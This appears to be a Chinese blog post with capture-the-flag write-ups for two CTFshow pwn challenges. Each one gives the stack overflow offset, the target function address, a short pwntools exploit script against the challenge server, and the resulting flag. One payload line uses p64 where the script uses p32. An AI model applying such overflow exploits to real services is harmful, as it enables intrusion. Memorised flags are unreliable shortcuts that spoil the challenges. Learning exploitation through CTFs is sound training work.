当前位置: 首页 > article >正文

CTFshow-pwn刷题

pwn02

32位的

双击pwnme这个函数

fgets函数,栈溢出

s的地址是-9,目标r的地址是4

这里有一个stack函数

地址是0x804850F

payload:

payload = b'a'*(0x9+4) + p64(0x0804850F)

exp

from pwn import*
p = remote('pwn.challenge.ctf.show',28185)
payload = b'a'*(0x9+4) + p32(0x0804850F)
p.sendline(payload)
p.sendline('cat flag')
p.interactive()

ctfshow{95cc7be7-bc2d-412b-9633-7131b3b507c3}

pwn05

32位的

F5main函数之后

双击welcome

双击s

s的地址是-14,目标地址r是4

getFlag的地址是:

0x8048486

构造payload

payload=b"a"*(0x14+4)+p32(0x08048486)

exp

from pwn import*
p = remote('pwn.challenge.ctf.show',28169)
payload=b"a"*(0x12+6)+p32(0x08048486)
p.sendline(payload)
p.sendline('cat flag')
p.interactive()

ctfshow{33456f1e-e589-4481-8e0c-465b3317b85d}


http://www.kler.cn/a/461950.html

相关文章:

  • 基于51单片机和16X16LED点阵屏(74HC138和74HC595驱动)的小游戏《贪吃蛇》
  • scrapy 教程
  • 【GO基础学习】gin的使用
  • 前端路由 Hash 和 History 模式原理对比区别
  • 基于 GPUTasker 的 GPU 使用情况钉钉推送机器人实现
  • 异步爬虫之aiohttp的使用
  • Mongodb日志报错too many open files,导致mongod进程down
  • 主数据驱动的数据治理框架
  • 探索 Yocto-Meta-OpenEuler:嵌入式开发的强大基石
  • [卫星遥感] 解密卫星目标跟踪:挑战与突破的深度剖析
  • OkHttp深度解析:请求流程、分发器机制、拦截器工作及TCP连接复用
  • 算法-Excel字母表转换成数字 26进制转换
  • Mono里运行C#脚本17—load_tables
  • ica1
  • 青云客-网页端语音机器人
  • 笔上云世界微服务版
  • LabVIEW声波谐振管自动化测量系统
  • 33. 简易内存池
  • 使用jest-axe为你的前端项目自动化测试
  • 免费又开源:企业级物联网平台的新选择 ThingsPanel
  • 如何使用 OpenCV 扫描图像、查找表和时间测量
  • 数据结构与算法之查找
  • Python大数据可视化:基于大数据技术的共享单车数据分析与辅助管理系统_flask+hadoop+spider
  • C++ 内存
  • 混合合并两个pdf文件
  • FastAPI 集成 MySQL 和 Redis:模型与模式生成实践